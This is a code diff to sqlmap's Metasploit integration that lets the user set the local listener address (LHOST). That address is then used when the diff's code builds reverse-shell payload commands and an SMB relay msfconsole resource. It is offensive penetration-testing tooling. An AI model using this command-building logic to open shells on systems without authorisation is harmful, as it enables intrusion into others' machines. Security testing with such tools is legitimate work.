@@ -62,6 +62,7 @@ class Metasploit:
6262
6363 def __initVars (self ):
6464 self .connectionStr = None
65+ self .lhostStr = None
6566 self .rhostStr = None
6667 self .portStr = None
6768 self .payloadStr = None
@@ -298,12 +299,30 @@ def __selectRhost(self):
298299 raise sqlmapDataException , "unexpected connection type"
299300
300301
302+ def __selectLhost (self ):
303+ if self .connectionStr .startswith ("reverse" ):
304+ message = "which is the local address? [%s] " % self .localIP
305+ address = readInput (message , default = self .localIP )
306+
307+ if not address :
308+ address = self .localIP
309+
310+ return address
311+
312+ elif self .connectionStr .startswith ("bind" ):
313+ return None
314+
315+ else :
316+ raise sqlmapDataException , "unexpected connection type"
317+
318+
301319 def __selectConnection (self ):
302320 return self .__skeletonSelection ("connection type" , self .__msfConnectionsList )
303321
304322
305323 def __prepareIngredients (self , encode = True , askChurrasco = True ):
306324 self .connectionStr = self .__selectConnection ()
325+ self .lhostStr = self .__selectLhost ()
307326 self .rhostStr = self .__selectRhost ()
308327 self .portStr = self .__selectPort ()
309328 self .payloadStr = self .__selectPayload (askChurrasco )
@@ -323,7 +342,7 @@ def __forgeMsfCliCmd(self, exitfunc="process"):
323342 self .__cliCmd += " RHOST=%s" % self .rhostStr
324343
325344 elif self .connectionStr .startswith ("reverse" ):
326- self .__cliCmd += " LHOST=%s" % self .localIP
345+ self .__cliCmd += " LHOST=%s" % self .lhostStr
327346
328347 else :
329348 raise sqlmapDataException , "unexpected connection type"
@@ -339,7 +358,7 @@ def __forgeMsfConsoleResource(self):
339358 self .__prepareIngredients (encode = False , askChurrasco = False )
340359
341360 self .__resource = "use windows/smb/smb_relay\n "
342- self .__resource += "set SRVHOST %s\n " % self .localIP
361+ self .__resource += "set SRVHOST %s\n " % self .lhostStr
343362 self .__resource += "set SRVPORT %s\n " % self .__selectSMBPort ()
344363 self .__resource += "set PAYLOAD %s/%s\n " % (self .payloadStr , self .connectionStr )
345364 self .__resource += "set LPORT %s\n " % self .portStr
@@ -348,7 +367,7 @@ def __forgeMsfConsoleResource(self):
348367 self .__resource += "set RHOST %s\n " % self .rhostStr
349368
350369 elif self .connectionStr .startswith ("reverse" ):
351- self .__resource += "set LHOST %s\n " % self .localIP
370+ self .__resource += "set LHOST %s\n " % self .lhostStr
352371
353372 else :
354373 raise sqlmapDataException , "unexpected connection type"
@@ -369,7 +388,7 @@ def __forgeMsfPayloadCmd(self, exitfunc="process", output="exe", extra=None):
369388 self .__payloadCmd += " LPORT=%s" % self .portStr
370389
371390 if self .connectionStr .startswith ("reverse" ):
372- self .__payloadCmd += " LHOST=%s" % self .localIP
391+ self .__payloadCmd += " LHOST=%s" % self .lhostStr
373392
374393 elif not self .connectionStr .startswith ("bind" ):
375394 raise sqlmapDataException , "unexpected connection type"
@@ -641,13 +660,14 @@ def smb(self):
641660 self .__initVars ()
642661 self .__randFile = "sqlmapunc%s.txt" % randomStr (lowercase = True )
643662
663+ self .__forgeMsfConsoleResource ()
664+ self .__forgeMsfConsoleCmd ()
665+
644666 if kb .dbms in ( "MySQL" , "PostgreSQL" ):
645- self .uncPath = "\\ \\ \\ \\ %s\\ \\ %s" % (self .localIP , self .__randFile )
667+ self .uncPath = "\\ \\ \\ \\ %s\\ \\ %s" % (self .lhostStr , self .__randFile )
646668 else :
647- self .uncPath = "\\ \\ %s\\ %s" % (self .localIP , self .__randFile )
669+ self .uncPath = "\\ \\ %s\\ %s" % (self .lhostStr , self .__randFile )
648670
649- self .__forgeMsfConsoleResource ()
650- self .__forgeMsfConsoleCmd ()
651671 self .__runMsfConsole ()
652672
653673 debugMsg = "Metasploit Framework 3 console exited with return "
0 commit comments